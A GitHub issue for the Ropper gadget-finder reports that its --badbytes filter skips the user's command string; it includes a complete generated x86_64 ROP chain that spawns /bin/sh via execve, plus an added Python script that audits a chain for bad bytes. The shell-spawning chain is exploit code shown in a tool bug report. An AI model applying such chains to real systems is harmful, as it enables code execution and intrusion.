sashs / Ropper

Display information about files in different file formats and find gadgets to build rop chains for different architectures (x86/x86_64, ARM/ARM64, MIPS, PowerPC, SPARC64). For disassembly ropper uses the awesome Capstone Framework.
https://scoding.de/ropper
BSD 3-Clause "New" or "Revised" License

Badbytes do not check strings placed on stack #113

Closed SweetVishnya closed 2 years ago

SweetVishnya commented 5 years ago
ropper --file /bin/bash --chain "execve cmd=/bin/sh" --badbytes 2f
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] filtering badbytes... 100%
[LOAD] removing double gadgets... 100%

[INFO] ROPchain Generator for syscall execve:

[INFO] 
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null

[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO] 

[INFO] Look for syscall gadget

[INFO] No syscall gadget found!

[INFO] Look for syscall opcode

[INFO] syscall opcode found
[INFO] generating rop chain
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000000000 # da85596376bf384c14525c50ca010e9ab96952cb811b4abe188c9ef1b75bff9a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000000000002d100) # 0x000000000002d100: pop r12; ret; 
rop += '//bin/sh'
rop += rebase_0(0x000000000002d1a0) # 0x000000000002d1a0: pop rbp; ret; 
rop += rebase_0(0x0000000000307000)
rop += rebase_0(0x0000000000078aa9) # 0x0000000000078aa9: mov qword ptr [rbp], r12; xor eax, eax; pop rbx; pop rbp; pop r12; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002d100) # 0x000000000002d100: pop r12; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002d1a0) # 0x000000000002d1a0: pop rbp; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x0000000000078aa9) # 0x0000000000078aa9: mov qword ptr [rbp], r12; xor eax, eax; pop rbx; pop rbp; pop r12; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002cdee) # 0x000000000002cdee: pop rdi; ret; 
rop += rebase_0(0x0000000000307000)
rop += rebase_0(0x000000000002e94a) # 0x000000000002e94a: pop rsi; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x00000000000bd2c3) # 0x00000000000bd2c3: pop rdx; and eax, 0xc0190100; and eax, 3; add eax, 1; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x000000000002d020) # 0x000000000002d020: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000001af8) # 0x0000000000001af8: syscall; 
print rop
[INFO] rop chain generated!

You have bad bytes on stack here:

rop += '//bin/sh'
sashs commented 5 years ago

Yes, that is true. Since the command is defined by the user, ropper does not check the command. I haven't implemented that, because I thought the user who creates a ropchain knows what he or she does. :) However, at least a warning should be printed.
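The gap the thread describes is that ropper filters the gadget addresses it picks against --badbytes, but not the user-supplied command it writes onto the stack. The script below is an added example, not ropper's own code, of the post-generation check a practitioner would run (and the warning sashs proposes): it rebuilds the first half of the generated chain as labelled elements, assumes a made-up IMAGE_BASE so the rebased gadget addresses are checked as well, and scans every element, including the literal string, for the bad byte set. The element labels and the base address are assumptions for this example.

```python
#!/usr/bin/env python3
"""Bad-byte audit of a packed ROP chain (added example, not ropper code).

The chain mirrors the issue's generated chain up to the first data write and
the register setup. IMAGE_BASE is a made-up value for this example; the chain
in the issue was generated with base 0.
"""
from struct import pack

IMAGE_BASE = 0x555555554000        # assumed base so rebased addresses get checked too
BADBYTES = bytes.fromhex("2f")     # the --badbytes 2f argument from the issue


def p64(x):
    """Pack a 64-bit little-endian value, like ropper's p()."""
    return pack("<Q", x)


def rebase(x):
    """Pack an image-relative address, like ropper's rebase_0()."""
    return p64(x + IMAGE_BASE)


def build_chain():
    """Return the chain as (label, bytes) elements; labels are for reporting only."""
    return [
        ("pop r12; ret",                 rebase(0x2d100)),
        ("cmd string (user supplied)",   b"//bin/sh"),   # not filtered by ropper
        ("pop rbp; ret",                 rebase(0x2d1a0)),
        ("data address for cmd",         rebase(0x307000)),
        ("mov [rbp], r12; pop rbx; pop rbp; pop r12; ret", rebase(0x78aa9)),
        ("padding rbx",                  p64(0xdeadbeefdeadbeef)),
        ("padding rbp",                  p64(0xdeadbeefdeadbeef)),
        ("padding r12",                  p64(0xdeadbeefdeadbeef)),
        ("pop rdi; ret",                 rebase(0x2cdee)),
        ("rdi = address of cmd",         rebase(0x307000)),
        ("pop rsi; ret",                 rebase(0x2e94a)),
        ("rsi = address of null",        rebase(0x307008)),
        ("pop rdx; ...; ret",            rebase(0xbd2c3)),
        ("rdx = address of null",        rebase(0x307008)),
        ("pop rax; ret",                 rebase(0x2d020)),
        ("rax = SYS_execve",             p64(0x3b)),
        ("syscall",                      rebase(0x1af8)),
    ]


def serialize(elements):
    """Concatenate the elements into the bytes that would be written to the stack."""
    return b"".join(blob for _, blob in elements)


def find_bad_bytes(elements, badbytes):
    """Scan every element, string literals included, and return
    a list of (chain_offset, element_label, bad_byte) hits."""
    hits = []
    offset = 0
    for label, blob in elements:
        for i, b in enumerate(blob):
            if b in badbytes:
                hits.append((offset + i, label, b))
        offset += len(blob)
    return hits


def find_bad_bytes_raw(chain, badbytes):
    """Same check over an already serialized chain; returns the offending offsets.
    Use this when all you have is the final payload, not its elements."""
    return [i for i, b in enumerate(chain) if b in badbytes]


def audit(elements=None, badbytes=BADBYTES):
    """Print a warning per hit, as ropper could do, and return the hits."""
    elements = build_chain() if elements is None else elements
    hits = find_bad_bytes(elements, badbytes)
    for off, label, b in hits:
        print(f"[WARN] bad byte 0x{b:02x} at chain offset {off} in {label!r}")
    if not hits:
        print("[OK] no bad bytes in chain")
    return hits


if __name__ == "__main__":
    audit()
```

Run it and the only hits are the three 0x2f bytes of the command string at chain offsets 8, 9 and 13, directly after the first 8-byte gadget address; every rebased gadget address passes. A null bad-byte set (--badbytes 00) would instead flag nearly every element, which is the usual reason a chain for a string-copy overflow needs a different delivery method rather than a different command.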